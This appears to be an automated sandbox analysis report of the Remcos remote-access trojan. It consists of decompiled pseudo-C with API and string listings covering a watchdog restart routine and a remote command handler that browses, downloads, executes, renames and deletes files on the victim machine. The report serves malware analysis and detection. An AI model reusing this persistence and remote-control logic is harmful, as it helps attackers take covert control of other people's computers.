						E0041A04A(0x473238, _t184);
						CloseHandle( *0x470d74);
						E00406150( &_v144);
						E00401EE9();
						E00401FB8();
						_push(3);
						_pop(1);
					} else {
						CloseHandle(_t45);
						_t202 = _t195 - 0x18;
						E00402073(0x473238, _t202, _t178, _t192, "Remcos restarted by watchdog!");
						_t203 = _t202 - 0x18;
						E00402073(0x473238, _t202 - 0x18, _t178, _t192, "i");
						E0041A04A(0x473238, 0);
						E00402073(0x473238, _t203 + 0x18, _t178, _t192, "Watchdog module activated");
						E00402073(0x473238, _t203 + 0x18 - 0x18, _t178, _t192, "i");
						E0041A04A(0x473238, 0);
						CreateThread(0, 0, E00411D31, 0, 0, 0);
						_t189 = "WDH";
						_t110 = E00412831(E00401F8B(0x473238), _t189,  &_v160);
						__eflags = _t110;
						if(_t110 == 0) {
							goto L1;
						} else {
							 *0x470d64 = OpenProcess(0x1fffff, 0, _v144);
							E00412C91(E00401F8B(0x473238), __eflags, _t189);
							_t158 = _v144;
							L15:
							L16();
							asm("int3");
							_push(_t189);
							_push(_t184);
							_t186 = _t158;
							L17:
							_t190 = OpenProcess(0x100000, 0, _t186);
							WaitForSingleObject(_t190, 0xffffffff);
							CloseHandle(_t190);
							__eflags =  *0x470d4b;
							if(__eflags != 0) {
								E0041163A(__eflags, 0);
							}
							goto L17;
						}
						L19:
					}
				} else {
					L1:
				}
				return 1;
				goto L19;
			}













































                0x00411640
                0x00411647
                0x00411649
                0x00411661
                0x0041166c
                0x0041167b
                0x00411681
                0x00411689
                0x0041168f
                0x00411691
                0x00411720
                0x0041172a
                0x00411735
                0x0041173e
                0x00411748
                0x0041174a
                0x004117ad
                0x004117c8
                0x004117dc
                0x004117e8
                0x004117f1
                0x0041174c
                0x00411758
                0x00411773
                0x00411784
                0x0041178d
                0x00411796
                0x0041179b
                0x004117fa
                0x00411803
                0x00411811
                0x0041181f
                0x00411828
                0x00411836
                0x00411844
                0x0041184d
                0x0041185b
                0x00411869
                0x00411872
                0x0041187b
                0x00411880
                0x00411882
                0x00411884
                0x00411884
                0x00411897
                0x004118a0
                0x004118a5
                0x004118a9
                0x004118af
                0x004118b1
                0x00000000
                0x00000000
                0x004118b7
                0x004118b8
                0x004118bd
                0x004118bf
                0x00000000
                0x00000000
                0x00000000
                0x004118bf
                0x00411924
                0x00411933
                0x00411938
                0x00411945
                0x0041194b
                0x00000000
                0x0041194b
                0x004118c1
                0x004118cb
                0x004118da
                0x004118df
                0x004118ed
                0x004118f7
                0x00411900
                0x00411909
                0x0041190e
                0x00411910
                0x00411697
                0x00411698
                0x0041169e
                0x004116a8
                0x004116ad
                0x004116b8
                0x004116bd
                0x004116cc
                0x004116d7
                0x004116dc
                0x004116ee
                0x004116f8
                0x00411708
                0x0041170f
                0x00411711
                0x00000000
                0x00411717
                0x00411966
                0x00411972
                0x00411978
                0x0041197c
                0x0041197c
                0x00411981
                0x00411982
                0x00411983
                0x00411984
                0x00411986
                0x00411994
                0x00411999
                0x004119a0
                0x004119a6
                0x004119ad
                0x004119b1
                0x004119b1
                0x00000000
                0x004119ad
                0x00000000
                0x00411711
                0x0041166e
                0x0041166e
                0x00411670
                0x00411917
                0x00000000

                APIs
                • GetCurrentProcessId.KERNEL32 ref: 00411649
                  • Part of subcall function 00412B5F: RegCreateKeyA.ADVAPI32(80000001,00000000,t@F), ref: 00412B6D
                  • Part of subcall function 00412B5F: RegSetValueExA.KERNELBASE(t@F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B6CC,00464C08,00000001,000000AF,00464074), ref: 00412B88
                  • Part of subcall function 00412B5F: RegCloseKey.ADVAPI32(?,?,?,?,0040B6CC,00464C08,00000001,000000AF,00464074), ref: 00412B93
                • OpenMutexA.KERNEL32 ref: 00411689
                • CloseHandle.KERNEL32(00000000), ref: 00411698
                • CreateThread.KERNEL32 ref: 004116EE
                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041195D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                • String ID: 2G$82G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$p3G$rmclient.exe$svchost.exe$Cqt
                • API String ID: 3018269243-2657394792
                • Opcode ID: a7b09a16690db1f1b0b11ea9556301142734d4814bd9f430769ac868473874ee
                • Instruction ID: 2a728e4d40dbe9f2dcab1c582d9c47d784adc50530ded27a5339f3dd002cc33c
                • Opcode Fuzzy Hash: a7b09a16690db1f1b0b11ea9556301142734d4814bd9f430769ac868473874ee
                • Instruction Fuzzy Hash: 1A719E3160430157C204FB62DD9ADAE77A8AF90308F40093FF546621E2EE7C9A49C6AF
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040730B Relevance: 34.1, APIs: 10, Strings: 9, Instructions: 835filesleepCOMMON
                Download Yara Rule
                C-Code - Quality: 83%
                			E0040730B(char* __edx, void* __eflags, intOrPtr _a4) {
				char _v268;
				char _v396;
				char _v400;
				char _v416;
				void* _v420;
				char _v424;
				char _v432;
				char _v440;
				char _v444;
				char _v448;
				char _v468;
				char _v476;
				char _v480;
				void* _v488;
				char _v492;
				char _v496;
				char _v504;
				char _v512;
				char _v516;
				char _v520;
				void* _v524;
				char _v528;
				char _v536;
				char _v540;
				char _v544;
				char _v548;
				char _v552;
				char _v556;
				char _v560;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				void* _v588;
				void* _v596;
				char _v600;
				char _v612;
				char _v620;
				char _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t166;
				int _t182;
				void* _t186;
				void* _t190;
				void* _t198;
				int _t200;
				int _t210;
				int _t213;
				void* _t229;
				int _t231;
				long _t237;
				int _t240;
				void* _t254;
				signed int _t256;
				void* _t267;
				char* _t269;
				void* _t270;
				void* _t281;
				void* _t297;
				void* _t307;
				void* _t324;
				void* _t325;
				void* _t338;
				void* _t345;
				void* _t349;
				int _t350;
				void* _t354;
				void* _t365;
				signed int _t379;
				void* _t383;
				void* _t388;
				void* _t398;
				int _t465;
				void* _t614;
				void* _t617;
				short* _t640;
				intOrPtr _t650;
				intOrPtr _t651;
				int _t652;
				int _t654;
				int _t656;
				int _t657;
				int _t658;
				int _t659;
				void* _t662;
				void* _t664;
				void* _t666;
				void* _t668;
				void* _t669;
				void* _t670;
				void* _t673;
				void* _t674;
				signed int _t675;
				void* _t678;
				void* _t679;
				void* _t680;
				void* _t683;
				void* _t684;
				void* _t685;
				void* _t686;
				void* _t688;
				void* _t689;
				void* _t690;
				void* _t699;
				void* _t700;
				void* _t718;
				void* _t719;
				void* _t720;
				void* _t722;
				void* _t724;
				void* _t732;
				void* _t733;
				void* _t734;
				void* _t735;
				void* _t736;
				void* _t738;
				signed int _t747;

				_t737 = __eflags;
				_t629 = __edx;
				_push(0);
				_t650 = _a4;
				E004020D6(0,  &_v444, __edx, __eflags, _t650 + 0xc);
				SetEvent( *(_t650 + 0x24));
				_t651 =  *((intOrPtr*)(E00401F8B( &_v448)));
				E00404182( &_v448,  &_v424, 4, 0xffffffff);
				_t678 = (_t675 & 0xfffffff8) - 0x20c;
				E004020D6(0, _t678, _t629, _t737, 0x472ec8);
				_t679 = _t678 - 0x18;
				E004020D6(0, _t679, _t629, _t737,  &_v440);
				E0041A976( &_v576, _t629);
				_t680 = _t679 + 0x30;
				_t738 = _t651 - 0x8d;
				if(_t738 > 0) {
					_t652 = _t651 - 0x8e;
					__eflags = _t652;
					if(_t652 == 0) {
						__eflags = 0;
						E0040415E(0,  &_v544, _t629, _t674, E00401F8B(E00401E45( &_v552, _t629, _t674, 0, 0)));
						_t166 = E00401F8B(E00401E45( &_v560, _t629, _t674, __eflags, 1));
						_t629 =  &_v552;
						CreateDirectoryW(E00401EE4(E004087F0( &_v480,  &_v552, _t674, _t166)), 0);
						E00401EE9();
						E0040322F(0x2a);
						E004086D0(0, _t680 - 0x18,  &_v552, __eflags,  &_v556);
						goto L57;
					} else {
						_t654 = _t652 - 3;
						__eflags = _t654;
						if(__eflags == 0) {
							_t182 = StrToIntA(E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
							_t629 = E00401F8B(E00401E45( &_v556, _t629, _t674, __eflags, 1));
							E0041B35B(_t182, _t184);
						} else {
							_t656 = _t654 - 0x24;
							__eflags = _t656;
							if(__eflags == 0) {
								 *0x470b18 = 0;
								_t186 = E00401E45( &_v552, _t629, _t674, __eflags, 2);
								_t683 = _t680 - 0x18;
								E004020D6(0, _t683, _t629, __eflags, _t186);
								_t684 = _t683 - 0x18;
								E0040415E(0, _t684, _t629, _t674, 0x46a8f0);
								_t190 = E00401F8B(E00401E45( &_v564, _t629, _t674, __eflags, 0));
								_t685 = _t684 - 0x18;
								E0040415E(0, _t685, _t629, _t674, _t190);
								E00401E45( &_v572, _t629, _t674, __eflags, 1);
								E00407E80(E0041A947(__eflags), _t629, __eflags);
								_t686 = _t685 + 0x48;
								__eflags =  *0x470b18; // 0x0
								if(__eflags == 0) {
									Sleep(0x7d0);
									E004020D6(0, _t686 - 0x18, _t629, __eflags, E00401E45( &_v552, _t629, _t674, __eflags, 0));
									_push(0xb9);
									goto L54;
								}
							} else {
								_t657 = _t656 - 3;
								__eflags = _t657;
								if(_t657 == 0) {
									 *0x470b18 = 1;
								} else {
									_t658 = _t657 - 0xa;
									__eflags = _t658;
									if(__eflags == 0) {
										_t198 = E00401E45( &_v552, _t629, _t674, __eflags, 2);
										_t688 = _t680 - 0x18;
										E004020D6(0, _t688, _t629, __eflags, _t198);
										_t200 = E00407268(_t674);
										_t689 = _t688 + 0x18;
										__eflags = _t200;
										if(_t200 != 0) {
											E00435760(0x472ec8,  &_v268, 0, 0x104);
											_t690 = _t689 + 0xc;
											 *0x470b20(E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)),  &_v268);
											_t210 = E0043A3AC(_t207, E00401F8B(E00401E45( &_v556, _t629, _t674, __eflags, 1)));
											__eflags = _t210;
											if(__eflags == 0) {
												_t691 = _t690 - 0x18;
												goto L50;
											} else {
												_t213 = _t210 - 1;
												__eflags = _t213;
												if(__eflags == 0) {
													E00402073(0,  &_v516, _t629, _t674,  &_v268);
													E004020D6(0, _t690 - 0x18, _t629, __eflags, 0x472fa8);
													E0040415E(0, _t690, _t629, _t674, 0x46a8f0);
													_t629 =  &_v528;
													E0041A7B9(_t690 - 0xffffffffffffffe8,  &_v528);
													_t465 = 0;
													__eflags = 0;
													goto L48;
												} else {
													__eflags = _t213 - 1;
													if(__eflags == 0) {
														E00402073(0,  &_v516, _t629, _t674,  &_v268);
														E004020D6(0, _t690 - 0x18, _t629, __eflags, 0x472fa8);
														E0040415E(0, _t690, _t629, _t674, 0x46a8f0);
														_t629 =  &_v528;
														E0041A7B9(_t690 - 0xffffffffffffffe8,  &_v528);
														_t465 = 1;
														L48:
														E004080F9(_t465, _t629, 0x472ec8);
														E00401FB8();
														DeleteFileA( &_v268);
													}
												}
											}
										}
									} else {
										_t659 = _t658 - 1;
										__eflags = _t659;
										if(__eflags == 0) {
											_t229 = E00401E45( &_v552, _t629, _t674, __eflags, 1);
											_t699 = _t680 - 0x18;
											E004020D6(0, _t699, _t629, __eflags, _t229);
											_t231 = E00407268(_t674);
											_t700 = _t699 + 0x18;
											__eflags = _t231;
											if(__eflags != 0) {
												 *0x470b1c(E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
												_t691 = _t700 - 0x14;
												L50:
												E004086D0(0, _t691, _t629, __eflags, 0x472f90);
												E00406EB0();
												goto L27;
											}
										} else {
											_t660 = _t659 - 4;
											__eflags = _t659 - 4;
											if(__eflags == 0) {
												_t237 = E0043A3AC(_t235, E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 1)));
												_t240 = SetFileAttributesW(E00401F8B(E00401E45( &_v556, _t629, _t674, __eflags, _t660)), _t237);
												__eflags = _t240;
												E0041A951(_t680 - 0x18, _t629);
												_push(0xc7);
												L54:
												E00404A81(0x472fc0, _t629, __eflags);
											}
										}
									}
								}
							}
						}
					}
				} else {
					if(_t738 == 0) {
						E0040415E(0,  &_v544, _t629, _t674, E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
						E0040415E(0,  &_v528, _t629, _t674, E00401F8B(E00401E45( &_v560, _t629, _t674, __eflags, 1)));
						E00408682( &_v564,  &_v516, 0, E0040869C( &_v556,  &_v528,  &_v528) + 1);
						_t254 = E00401EE4(E00408897( &_v504,  &_v528, _t674,  &_v552));
						_t256 = E0043E1F7(E00401EE4( &_v576), _t254);
						asm("sbb bl, bl");
						E00401EE9();
						_t408 =  ~_t256 + 1;
						__eflags =  ~_t256 + 1;
						if( ~_t256 + 1 == 0) {
							_t629 = E004052FE( &_v468, "Unable to rename file!", _t674, 0x472ec8);
							E00408832(_t408, _t680 - 0x18, _t258, 0x472ec8, _t674, __eflags, "16");
							_push(0x59);
							E00404A81(0x472fc0, _t258, __eflags);
							E00401FB8();
						} else {
							_t629 =  &_v492;
							E004087F0(_t680 - 0x18,  &_v492, _t674, "*");
							E00406EB0();
						}
						E00401EE9();
						E00401EE9();
						goto L58;
					} else {
						_t662 = _t651 - 0x61;
						if(_t662 == 0) {
							_t267 = E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0));
							_t691 = _t680 - 0x18;
							E0040415E(0, _t680 - 0x18, _t629, _t674, _t267);
							_t269 = E00401E45( &_v560, _t629, _t674, __eflags, 2);
							_t270 = E00401E45( &_v564, _t629, _t674, __eflags, 1);
							_t629 = _t269;
							E00419BA2(_t270, _t269);
							L27:
						} else {
							_t664 = _t662 - 0x26;
							if(_t664 == 0) {
								GetLogicalDriveStringsA(0x64,  &_v396);
								E00402097(0,  &_v540, _t629, _t674, __eflags,  &_v396, 0x64);
								__eflags = E004061F0( &_v548, 0x464518, 0, 2) + 1;
								E00401F7D(E004061F0( &_v548, 0x464518, 0, 2) + 1);
								E004020D6(0, _t680 - 0x18, _t629, E004061F0( &_v548, 0x464518, 0, 2) + 1,  &_v564);
								_t281 = E00407121(0,  &_v544, _t629);
								_t629 = E00402F11( &_v496,  &_v568, _t674, 0x472ec8);
								E00402E81(_t680 - 0x18, _t282, _t281);
								_push(0x51);
								E00404A81(0x472fc0, _t282, __eflags);
								E00401FB8();
								E00401FB8();
								goto L25;
							} else {
								_t666 = _t664 - 1;
								if(_t666 == 0) {
									L004086CB(0, 0x472f90, _t629, E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
									E004086D0(0, _t680 - 0x18, _t629, __eflags, 0x472f90);
									E00406EB0();
									_t297 = E0041A819( &_v492, E00408682(0x472f90,  &_v528, 0, E0040245C() - 2));
									_t629 = "Browsing directory: ";
									E004052DD(0, _t680 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t674, __eflags, _t297);
									E00402073(0, _t680 - 0x18 + 0x18 - 4, "Browsing directory: ", _t674, "i");
									E0041A04A(0, 0x472ec8);
									E00401FB8();
									goto L59;
								} else {
									_t668 = _t666 - 1;
									if(_t668 == 0) {
										E0040415E(0,  &_v544, _t629, _t674, E00401F8B(E00401E45( &_v552, _t629, _t674, __eflags, 0)));
										ShellExecuteW(0, L"open", E00401EE4( &_v548), 0, 0, 1);
										_t307 = E0041A819( &_v476,  &_v548);
										_t629 = "Executing file: ";
										E004052DD(0, _t680 - 0x18, "Executing file: ", _t674, __eflags, _t307);
										E00402073(0, _t680 - 4, "Executing file: ", _t674, "i");
										E0041A04A(0, 0x472ec8);
										E00401FB8();
										goto L58;
									} else {
										_t669 = _t668 - 1;
										if(_t669 == 0) {
											 *0x470b18 = 0;
											E004020D6(0, _t680 - 0x18, _t629, __eflags, E00401E45( &_v552, _t629, _t674, __eflags, 2));
											E0040415E(0, _t680, _t629, _t674, 0x46a8f0);
											E0040415E(0, _t680 - 0xffffffffffffffe8, _t629, _t674, E00401F8B(E00401E45( &_v564, _t629, _t674, __eflags, 0)));
											E00401E45( &_v572, _t629, _t674, __eflags, 1);
											E004080F9(E0041A947(__eflags), _t629, 0x472ec8);
										} else {
											_t670 = _t669 - 1;
											if(_t670 == 0) {
												 *0x470b18 = 0;
												E004020BF(0,  &_v468);
												E004046D7( &_v396, _t674, 1);
												E004048A8( &_v400, _t670,  &_v396);
												_t324 = E00401E45( &_v560, _t629, _t674, __eflags, 3);
												_t718 = _t680 - 0x18;
												_t325 = E00401E45( &_v564, _t629, _t674, __eflags, 2);
												E00402EF0(0, _t718, E00402EF0(0,  &_v536, E00402EF0(0,  &_v512, E00402F11( &_v560, E00401E45( &_v568, _t629, _t674, __eflags, 1), _t674, 0x472ec8), _t674, __eflags, _t325), _t674, __eflags, 0x472ec8), _t674, __eflags, _t324);
												_push(0x56);
												E00404A81( &_v416, _t329, __eflags);
												E00401FB8();
												E00401FB8();
												E00401FB8();
												E0040415E(0,  &_v544, _t329, _t674, E00401F8B(E00401E45( &_v600, _t329, _t674, __eflags, 0)));
												_t338 = E0041A819( &_v572,  &_v548);
												_t719 = _t718 - 0x18;
												_t640 = "Downloading file: ";
												E004052DD(0, _t719, _t640, _t674, __eflags, _t338);
												_t720 = _t719 - 0x14;
												_t672 = "i";
												E00402073(0, _t720, _t640, _t674, "i");
												E0041A04A(0, 0x472ec8);
												E00401FB8();
												E00401EE9();
												_t345 = E00401F8B(E00401E45( &_v612, _t640, _t674, __eflags, 0));
												_t722 = _t720 + 0x30 - 0x18;
												E0040415E(0, _t722, _t640, _t674, _t345);
												_t349 = E0043E147(_t347, E00401F8B(E00401E45( &_v620, _t640, _t674, __eflags, 4)), 0, 0xa);
												_push(_t640);
												_push(_t349);
												_t350 = E00406FD7( &_v468, __eflags);
												_t724 = _t722 + 0x2c;
												_push(0);
												__eflags = _t350;
												if(__eflags == 0) {
													E0040415E(0,  &_v516, _t640, _t674, E00401F8B(E00401E45( &_v624, _t640, _t674, __eflags)));
													_t354 = E0041A819( &_v544,  &_v520);
													_t629 = "Failed to download file: ";
													E004052DD(0, _t724 - 0x18, "Failed to download file: ", _t674, __eflags, _t354);
													E00402073(0, _t724 - 4, "Failed to download file: ", _t674, "E");
													E0041A04A(0, 0x472ec8);
													E00401FB8();
													E00401EE9();
												} else {
													E0040415E(0,  &_v516, _t640, _t674, E00401F8B(E00401E45( &_v624, _t640, _t674, __eflags)));
													_t365 = E0041A819( &_v544,  &_v520);
													_t629 = "Downloaded file: ";
													E004052DD(0, _t724 - 0x18, "Downloaded file: ", _t674, __eflags, _t365);
													E00402073(0, _t724 - 4, "Downloaded file: ", _t674, "i");
													E0041A04A(0, 0x472ec8);
													E00401FB8();
													E00401EE9();
													E00402073(0, _t724 - 4 + 0x30 - 0x18, "Downloaded file: ", _t674, 0x464074);
													_push(0x58);
													E00404A81( &_v432, "Downloaded file: ", __eflags);
												}
												E00404E06(_t629);
												E00404EC2(0,  &_v416, _t629, _t672);
												L25:
												E00401FB8();
											} else {
												_t673 = _t670 - 1;
												_t745 = _t673;
												if(_t673 == 0) {
													E0040415E(0,  &_v544, _t629, _t674, E00401F8B(E00401E45( &_v552, _t629, _t674, _t745, _t673)));
													if((GetFileAttributesW(E00401EE4( &_v548)) & 0x00000010) == 0) {
														_t379 = DeleteFileW(E00401EE4( &_v548));
													} else {
														_t379 = E0041AC0A(E00401EE4( &_v548), _t629);
													}
													_t747 = _t379;
													_t748 = _t379 & 0xffffff00 | _t747 != 0x00000000;
													if((_t379 & 0xffffff00 | _t747 != 0x00000000) == 0) {
														_t732 = _t680 - 0x18;
														E0041A879(0, _t732,  &_v540);
														_push(0x55);
														E00404A81(0x472fc0,  &_v540, __eflags);
														_t383 = E0041A819( &_v544,  &_v568);
														_t733 = _t732 - 0x18;
														_t645 = "Unable to delete: ";
														E004052DD(0, _t733, "Unable to delete: ", _t674, __eflags, _t383);
														_t734 = _t733 - 0x14;
														_t614 = _t734;
														_push("E");
													} else {
														_t398 = E0041A819( &_v516,  &_v540);
														_t736 = _t680 - 0x18;
														_t645 = "Deleted file: ";
														E004052DD(0, _t736, "Deleted file: ", _t674, _t748, _t398);
														_t734 = _t736 - 0x14;
														_t614 = _t734;
														_push("i");
													}
													E00402073(0, _t614, _t645, _t674);
													E0041A04A(0, 0x472ec8);
													_t735 = _t734 + 0x30;
													E00401FB8();
													_t388 = E00401E45( &_v576, _t645, _t674, _t748, 1);
													_t629 = "1";
													_t617 = _t388;
													if(E00405AE5("1") != 0) {
														E004086B8(E0040869C( &_v560, _t617, _t617) + 1);
														_push(0x2a);
														_t629 =  &_v572;
														E00401EF3( &_v572,  &_v572, _t673, E00402F52(0,  &_v548,  &_v572, _t674));
														E00401EE9();
														E0040415E(0, _t735 - 0x18,  &_v572, _t674, E00401EE4( &_v576));
														L57:
														E00406EB0();
													}
													L58:
													L59:
													E00401EE9();
												}
											}
										}
									}
								}
							}
						}
					}
				}
				E00401E6D( &_v552, _t629);
				E00401FB8();
				E00401FB8();
				return 0;
			}



























































































































                0x0040730b
                0x0040730b
                0x0040731b
                0x0040731d
                0x00407325
                0x0040732d
                0x00407347
                0x00407351
                0x00407356
                0x00407361
                0x00407366
                0x00407373
                0x0040737c
                0x00407386
                0x00407389
                0x0040738b
                0x00407ace
                0x00407ace
                0x00407ad4
                0x00407dd6
                0x00407dee
                0x00407e01
                0x00407e07
                0x00407e1d
                0x00407e27
                0x00407e32
                0x00407e41
                0x00000000
                0x00407ada
                0x00407ada
                0x00407ada
                0x00407add
                0x00407dae
                0x00407dc8
                0x00407dcc
                0x00407ae3
                0x00407ae3
                0x00407ae3
                0x00407ae6
                0x00407cfe
                0x00407d04
                0x00407d09
                0x00407d0f
                0x00407d14
                0x00407d1e
                0x00407d2f
                0x00407d34
                0x00407d3a
                0x00407d45
                0x00407d53
                0x00407d58
                0x00407d5b
                0x00407d61
                0x00407d6c
                0x00407d82
                0x00407d87
                0x00000000
                0x00407d87
                0x00407aec
                0x00407aec
                0x00407aec
                0x00407aef
                0x00407cea
                0x00407af5
                0x00407af5
                0x00407af5
                0x00407af8
                0x00407ba4
                0x00407ba9
                0x00407baf
                0x00407bb4
                0x00407bb9
                0x00407bbc
                0x00407bbe
                0x00407bd4
                0x00407bd9
                0x00407bf6
                0x00407c17
                0x00407c17
                0x00407c19
                0x00407cd1
                0x00000000
                0x00407c1f
                0x00407c1f
                0x00407c1f
                0x00407c22
                0x00407c7a
                0x00407c89
                0x00407c98
                0x00407ca0
                0x00407ca6
                0x00407cab
                0x00407cab
                0x00000000
                0x00407c24
                0x00407c24
                0x00407c27
                0x00407c39
                0x00407c48
                0x00407c57
                0x00407c5f
                0x00407c65
                0x00407c6a
                0x00407cad
                0x00407cad
                0x00407cb9
                0x00407cc6
                0x00407cc6
                0x00407c27
                0x00407c22
                0x00407c19
                0x00407afe
                0x00407afe
                0x00407afe
                0x00407b01
                0x00407b5d
                0x00407b62
                0x00407b68
                0x00407b6d
                0x00407b72
                0x00407b75
                0x00407b77
                0x00407b90
                0x00407b96
                0x00407cd4
                0x00407cdb
                0x00407ce0
                0x00000000
                0x00407ce0
                0x00407b03
                0x00407b03
                0x00407b03
                0x00407b06
                0x00407b1f
                0x00407b38
                0x00407b3e
                0x00407b48
                0x00407b4d
                0x00407d8c
                0x00407d91
                0x00407d91
                0x00407b06
                0x00407b01
                0x00407af8
                0x00407aef
                0x00407ae6
                0x00407add
                0x00407391
                0x00407391
                0x004079e3
                0x004079ff
                0x00407a1b
                0x00407a35
                0x00407a45
                0x00407a54
                0x00407a56
                0x00407a5b
                0x00407a5b
                0x00407a5e
                0x00407a98
                0x00407a9c
                0x00407aa2
                0x00407aa9
                0x00407ab2
                0x00407a60
                0x00407a63
                0x00407a6e
                0x00407a74
                0x00407a79
                0x00407abb
                0x00407ac4
                0x00000000
                0x00407397
                0x00407397
                0x0040739a
                0x00407992
                0x00407997
                0x0040799d
                0x004079a8
                0x004079b5
                0x004079ba
                0x004079be
                0x004079c3
                0x004073a0
                0x004073a0
                0x004073a3
                0x004078ec
                0x00407900
                0x00407917
                0x0040791d
                0x0040792c
                0x00407935
                0x0040794f
                0x00407953
                0x00407959
                0x00407960
                0x00407969
                0x00407972
                0x00000000
                0x004073a9
                0x004073a9
                0x004073ac
                0x0040786e
                0x00407879
                0x0040787e
                0x004078a4
                0x004078ac
                0x004078b4
                0x004078c3
                0x004078c8
                0x004078d4
                0x00000000
                0x004073b2
                0x004073b2
                0x004073b5
                0x004077f2
                0x0040780b
                0x00407819
                0x00407821
                0x00407829
                0x00407838
                0x0040783d
                0x00407849
                0x00000000
                0x004073bb
                0x004073bb
                0x004073be
                0x00407778
                0x00407789
                0x00407798
                0x004077b4
                0x004077bf
                0x004077cd
                0x004073c4
                0x004073c4
                0x004073c7
                0x0040751f
                0x00407525
                0x00407533
                0x00407540
                0x0040754b
                0x00407550
                0x0040755d
                0x00407597
                0x0040759d
                0x004075a6
                0x004075af
                0x004075b8
                0x004075c1
                0x004075dc
                0x004075e9
                0x004075ee
                0x004075f1
                0x004075f9
                0x004075fe
                0x00407601
                0x00407609
                0x0040760e
                0x0040761a
                0x00407623
                0x00407634
                0x00407639
                0x0040763f
                0x0040765a
                0x00407669
                0x0040766a
                0x0040766b
                0x00407670
                0x00407677
                0x00407678
                0x0040767a
                0x00407704
                0x00407711
                0x00407719
                0x00407721
                0x00407730
                0x00407735
                0x00407741
                0x0040774a
                0x0040767c
                0x0040768d
                0x0040769a
                0x004076a2
                0x004076aa
                0x004076b5
                0x004076ba
                0x004076c6
                0x004076cf
                0x004076de
                0x004076e3
                0x004076ec
                0x004076ec
                0x00407756
                0x00407762
                0x0040797b
                0x0040797b
                0x004073cd
                0x004073cd
                0x004073cd
                0x004073d0
                0x004073ec
                0x00407407
                0x0040741d
                0x00407409
                0x00407410
                0x00407410
                0x00407423
                0x0040742c
                0x0040742e
                0x00407455
                0x0040745a
                0x0040745f
                0x00407466
                0x00407473
                0x00407478
                0x0040747b
                0x00407483
                0x00407488
                0x0040748b
                0x0040748d
                0x00407430
                0x00407434
                0x00407439
                0x0040743c
                0x00407444
                0x00407449
                0x0040744c
                0x0040744e
                0x0040744e
                0x00407492
                0x00407497
                0x0040749c
                0x004074a3
                0x004074ae
                0x004074b3
                0x004074b8
                0x004074c1
                0x004074d8
                0x004074dd
                0x004074df
                0x004074f2
                0x004074fb
                0x0040750f
                0x00407e46
                0x00407e46
                0x00407e4b
                0x00407e4e
                0x00407e52
                0x00407e52
                0x00407e52
                0x004073d0
                0x004073c7
                0x004073be
                0x004073b5
                0x004073ac
                0x004073a3
                0x0040739a
                0x00407391
                0x00407e5b
                0x00407e67
                0x00407e70
                0x00407e7d

                APIs
                • SetEvent.KERNEL32(?,?), ref: 0040732D
                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 004073FB
                • DeleteFileW.KERNEL32(00000000), ref: 0040741D
                  • Part of subcall function 0041AC0A: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AC65
                  • Part of subcall function 0041AC0A: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AC95
                  • Part of subcall function 0041AC0A: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041ACEA
                  • Part of subcall function 0041AC0A: FindClose.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD4B
                  • Part of subcall function 0041AC0A: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD52
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                  • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                  • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00472EE0,?), ref: 00404B27
                  • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00472EE0,?,?,?,?,?,?,0040545D), ref: 00404B55
                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0040780B
                • GetLogicalDriveStringsA.KERNEL32 ref: 004078EC
                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 00407B38
                • DeleteFileA.KERNEL32(?), ref: 00407CC6
                  • Part of subcall function 00407E80: __EH_prolog.LIBCMT ref: 00407E85
                  • Part of subcall function 00407E80: FindFirstFileW.KERNEL32(00000000,?,004645D0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F3E
                  • Part of subcall function 00407E80: __CxxThrowException@8.LIBVCRUNTIME ref: 00407F66
                  • Part of subcall function 00407E80: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F73
                • Sleep.KERNEL32(000007D0), ref: 00407D6C
                • StrToIntA.SHLWAPI(00000000,00000000), ref: 00407DAE
                  • Part of subcall function 0041B35B: SystemParametersInfoW.USER32 ref: 0041B450
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
